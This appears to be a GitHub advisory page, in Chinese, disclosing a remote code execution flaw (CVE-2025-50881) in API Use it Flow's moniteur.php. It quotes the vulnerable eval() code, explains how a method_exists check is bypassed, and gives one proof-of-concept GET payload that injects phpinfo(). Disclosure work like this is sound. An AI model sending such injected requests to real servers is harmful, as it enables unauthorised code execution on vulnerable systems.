0xdeadbit/CVE-2025-50881
GitHub: 0xdeadbit/CVE-2025-50881
针对 API Use it Flow 系统中 `moniteur.php` 组件存在的远程代码执行漏洞(CVE-2025-50881)提供的概念验证与利用代码。
Stars: 0 | Forks: 0
# CVE-2025-50881:API Use it Flow via moniteur.php 中的远程代码执行漏洞
**标识符:** CVE-2025-50881
**受影响产品:** API Use it Flow 版本 8.2.0 (Rev 15851),版本 9.2.0 (Rev 18093)
**厂商:** https://api-sas.fr/
**受影响组件:** `flow/admin/moniteur.php`
**漏洞类型:** 通过 `eval()` 注入实现的远程代码执行 (RCE)
**严重程度:** 严重
**描述:**
`flow/admin/moniteur.php` 脚本存在远程代码执行漏洞。在处理 GET 请求时,该脚本获取 `action` URL 参数中的用户输入,在验证不充分的情况下,将此输入整合到字符串 (`$wscom`) 中,随后该字符串被 `eval()` 函数执行。虽然执行了 `method_exists()` 检查,但它仅验证用户输入中第一个左括号 `(` *之前* 的部分,允许攻击者在有效的方法调用结构后追加任意 PHP 代码。利用此漏洞,未经身份验证或仅通过简单身份验证的攻击者可以以 Web 服务器进程的权限在服务器上执行任意 PHP 代码。
**易受攻击代码片段:**
**文件:** `flow/admin/moniteur.php`
1. **读取用户输入 (第 ~45 行):**
if (isset($_GET['action'])) {$action=urldecode(htmlentities($_GET['action']));} else notice($server);
*注释:`$action` 直接派生自用户输入 (`$_GET['action']`),仅进行了 URL 解码和 HTML 实体编码,这无法防止代码注入。*
2. **构建命令字符串 (第 ~47 行):**
$wscom='$ws->'.$action;
*注释:用户控制的 `$action` 被连接到 `$wscom` 字符串中。*
3. **验证不充分 (第 ~49 行):**
$func=explode("(",$action);
if (method_exists($ws, $func[0])) {
*注释:仅检查 `$action` 中第一个左括号之前的部分是否为 `UIFWebService` 类中的有效方法。*
4. **通过 `eval()` 执行代码 (第 ~50 行):**
eval('$res=' . $wscom . ';');
*注释:包含用户输入的构建字符串 `$wscom` 被作为 PHP 代码执行。*
**漏洞利用:**
攻击者可以构造一个发往 moniteur.php 的 GET 请求,提供任意的 `login` 和 `password` 参数(因为它们仅在被调用的方法内部用于身份验证,而非用于 `eval` 本身)以及一个恶意的 `action` 参数。`action` 参数必须以 `UIFWebService` 类中的有效方法名(例如 `get_data`)开头,以通过 `method_exists` 检查,随后拼接注入的 PHP 代码。
**示例 Payload:**
```
GET /admin/moniteur.php?login=foo&password=bar&action=get_data(1);phpinfo();$res=0; HTTP/1.1
Host:
```
此 Payload 导致 `eval()` 执行类似于以下的代码:
`$res = $ws->get_data(1);phpinfo();$res=0;;`
这将执行 `get_data` 方法,然后执行 `phpinfo()`,最后将 `$res` 设置为 `0`。
**影响:**
攻击者可以在服务器上执行任意命令,这可能导致:
* 系统完全沦陷。
* 数据窃取(数据库内容、敏感文件)。
* 数据修改或删除。
* 安装恶意软件或后门。
* 利用被攻陷的服务器攻击其他系统。
**披露时间线:**
* 2025-04-22 : 通知厂商 Use It Flow 产品存在漏洞
* 2025-04-24 : 厂商确认 v8 和 v9 版本存在漏洞,表示版本 10 将修复此问题,但未计划发布日期,也不计划通知客户有关漏洞的信息。
* 2025-08-24 : 联系厂商询问 v10 发布日期。未收到回复。
* 2026-03-16 : **CVE-2025-50881** 完全披露
标签:API SAS, API Use It Flow, CISA项目, CVE-2025-50881, eval注入, moniteur.php, PHP安全漏洞, RCE, Web安全, 事件响应, 参数校验绕过, 编程工具, 网络安全, 蓝队分析, 输入验证不足, 远程代码执行, 隐私保护, 高危漏洞